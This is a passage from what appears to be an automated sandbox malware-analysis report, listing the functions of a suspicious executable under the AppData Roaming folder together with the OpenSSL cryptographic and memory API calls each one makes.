Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1028 EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_new,RSA_pkey_ctx_ctrl,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_free, 24_2_00007FFD932B1028
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD933033D0 CRYPTO_malloc,memcpy, 24_2_00007FFD933033D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D93D0 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 24_2_00007FFD932D93D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1A0A EVP_MD_size,EVP_CIPHER_iv_length,EVP_CIPHER_key_length,CRYPTO_clear_free,CRYPTO_malloc, 24_2_00007FFD932B1A0A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DD3C0 CRYPTO_malloc,CRYPTO_clear_free, 24_2_00007FFD932DD3C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2446 CRYPTO_free,CRYPTO_memdup,ERR_put_error, 24_2_00007FFD932B2446
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B231A CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B231A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B23DD CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B23DD
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E7270 CRYPTO_free, 24_2_00007FFD932E7270
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330F2D0 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse, 24_2_00007FFD9330F2D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932EF2C0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932EF2C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1253 CRYPTO_free, 24_2_00007FFD932B1253
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2144 EVP_MD_CTX_new,EVP_MD_CTX_copy_ex,CRYPTO_memcmp,memcpy,memcpy, 24_2_00007FFD932B2144
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E7310 CRYPTO_free,CRYPTO_free, 24_2_00007FFD932E7310
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B17A3 CRYPTO_free, 24_2_00007FFD932B17A3
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FB2E0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932FB2E0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F7320 CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932F7320
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330D230 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,CRYPTO_memcmp,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD9330D230
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E31F0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free, 24_2_00007FFD932E31F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B207C CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 24_2_00007FFD932B207C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B24D7 CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B24D7
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F7090 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932F7090
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C7093 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932C7093
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932EF080 CRYPTO_realloc, 24_2_00007FFD932EF080
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B23EC CRYPTO_free,CRYPTO_malloc,memcmp,CRYPTO_memdup, 24_2_00007FFD932B23EC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B228E CRYPTO_free, 24_2_00007FFD932B228E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B191F ERR_put_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,OPENSSL_sk_value,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,BIO_up_ref,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup, 24_2_00007FFD932B191F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E5120 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 24_2_00007FFD932E5120
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E7770 CRYPTO_free, 24_2_00007FFD932E7770
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2400 CRYPTO_malloc,ERR_put_error,CRYPTO_free, 24_2_00007FFD932B2400
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1859 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_size, 24_2_00007FFD932B1859
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1847 CRYPTO_free, 24_2_00007FFD932B1847
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CD820 CRYPTO_THREAD_run_once, 24_2_00007FFD932CD820
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B24AF CRYPTO_free,CRYPTO_malloc,memcpy, 24_2_00007FFD932B24AF
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C76D0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free, 24_2_00007FFD932C76D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B10A5 CRYPTO_zalloc,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup, 24_2_00007FFD932B10A5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E36F0 CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 24_2_00007FFD932E36F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DF730 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 24_2_00007FFD932DF730
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B18C5 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932B18C5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9331B5C0 memset,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 24_2_00007FFD9331B5C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330F5D0 EVP_PKEY_get0_RSA,RSA_size,RSA_size,CRYPTO_malloc,RAND_priv_bytes,CRYPTO_free, 24_2_00007FFD9330F5D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1C44 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free, 24_2_00007FFD932B1C44
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1B04 CRYPTO_malloc,CRYPTO_mem_ctrl,OPENSSL_sk_find,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error, 24_2_00007FFD932B1B04
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93317650 CRYPTO_free,CRYPTO_malloc,ERR_put_error, 24_2_00007FFD93317650
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D9630 ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_put_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data, 24_2_00007FFD932D9630
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B18BB CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 24_2_00007FFD932B18BB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B141F EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 24_2_00007FFD932B141F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C9480 ASN1_item_d2i,ERR_put_error,ASN1_item_free,memcpy,_time64,X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ASN1_item_free, 24_2_00007FFD932C9480
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E7460 CRYPTO_free, 24_2_00007FFD932E7460
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E74D0 CRYPTO_free, 24_2_00007FFD932E74D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330B530 CRYPTO_memcmp, 24_2_00007FFD9330B530
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B9540 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 24_2_00007FFD932B9540
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93301520 CRYPTO_free, 24_2_00007FFD93301520
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E9B90 CRYPTO_memcmp, 24_2_00007FFD932E9B90
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B7BD0 CRYPTO_free, 24_2_00007FFD932B7BD0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D1BD0 CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932D1BD0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1ABE CONF_parse_list,CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B1ABE
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2095 CRYPTO_free,_time64,CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free, 24_2_00007FFD932B2095
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1870 CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B1870
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B101E EVP_PKEY_free,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_clear_free, 24_2_00007FFD932B101E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932EFAF0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932EFAF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1686 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B1686
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330FAF0 BN_bin2bn,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD9330FAF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CFB30 CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 24_2_00007FFD932CFB30
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1663 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B1663
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B215D CRYPTO_free,CRYPTO_malloc,RAND_bytes, 24_2_00007FFD932B215D
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1D8E BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932B1D8E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1F6E CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B1F6E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1695 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 24_2_00007FFD932B1695
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D58A7 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 24_2_00007FFD932D58A7
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B218F EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,EVP_DigestSign,BUF_reverse,CRYPTO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_MD_CTX_free, 24_2_00007FFD932B218F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1C0D CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932B1C0D
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B193A CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B193A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B125D BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 24_2_00007FFD932B125D
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B7F80 CRYPTO_zalloc,ERR_put_error, 24_2_00007FFD932B7F80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93301F80 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy, 24_2_00007FFD93301F80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CBFB0 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free, 24_2_00007FFD932CBFB0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C9FB0 CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932C9FB0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B9FF0 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B9FF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BDFF0 CRYPTO_free, 24_2_00007FFD932BDFF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B405B BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_clear_flags,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 24_2_00007FFD932B405B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932EA050 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 24_2_00007FFD932EA050
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C5E80 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 24_2_00007FFD932C5E80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CDE70 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 24_2_00007FFD932CDE70
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1CD5 CRYPTO_malloc,COMP_expand_block, 24_2_00007FFD932B1CD5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F7EC7 CRYPTO_clear_free, 24_2_00007FFD932F7EC7
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9331BF20 SRP_Calc_u,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,CRYPTO_clear_free,BN_clear_free, 24_2_00007FFD9331BF20
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1F01 CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free, 24_2_00007FFD932B1F01
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1E6A CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,CRYPTO_free, 24_2_00007FFD932B1E6A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B16E5 CRYPTO_zalloc, 24_2_00007FFD932B16E5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CDD80 CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 24_2_00007FFD932CDD80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932EFDC0 CRYPTO_free,CRYPTO_free, 24_2_00007FFD932EFDC0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CFDA0 strncmp,strncmp,strncmp,strncmp,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,ERR_put_error,strncmp,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free, 24_2_00007FFD932CFDA0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1F28 CRYPTO_free,CRYPTO_malloc,memcpy, 24_2_00007FFD932B1F28
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E9E30 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932E9E30
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B7E20 CRYPTO_zalloc,ERR_put_error, 24_2_00007FFD932B7E20
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B150A CRYPTO_free,CRYPTO_malloc,ERR_put_error,memcpy, 24_2_00007FFD932B150A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B12E4 EVP_MD_size,RAND_bytes,_time64,CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B12E4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B20F4 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 24_2_00007FFD932B20F4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FFC60 CRYPTO_free,CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932FFC60
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93307D00 CRYPTO_memcmp, 24_2_00007FFD93307D00
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B24D2 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_memcmp,CRYPTO_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_value,X509_get0_pubkey,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free, 24_2_00007FFD932B24D2
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D3D40 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932D3D40
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1104 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 24_2_00007FFD932B1104
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B22CA ERR_put_error,CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932B22CA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B7D20 CRYPTO_free, 24_2_00007FFD932B7D20
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2310 CRYPTO_free, 24_2_00007FFD932B2310
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F03A0 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932F03A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1514 CRYPTO_free, 24_2_00007FFD932B1514
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BE3F0 CRYPTO_malloc, 24_2_00007FFD932BE3F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E83F0 CRYPTO_zalloc,CRYPTO_free, 24_2_00007FFD932E83F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C63EA CRYPTO_free, 24_2_00007FFD932C63EA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D2450 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free, 24_2_00007FFD932D2450
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B4437 CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags, 24_2_00007FFD932B4437
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C8420 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free, 24_2_00007FFD932C8420
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E42D0 OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 24_2_00007FFD932E42D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C62B0 CRYPTO_free,CRYPTO_strdup, 24_2_00007FFD932C62B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1E60 CRYPTO_clear_free, 24_2_00007FFD932B1E60
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B17D5 CRYPTO_malloc,memcpy, 24_2_00007FFD932B17D5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD9330A35C CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD9330A35C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD933082E0 CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD933082E0
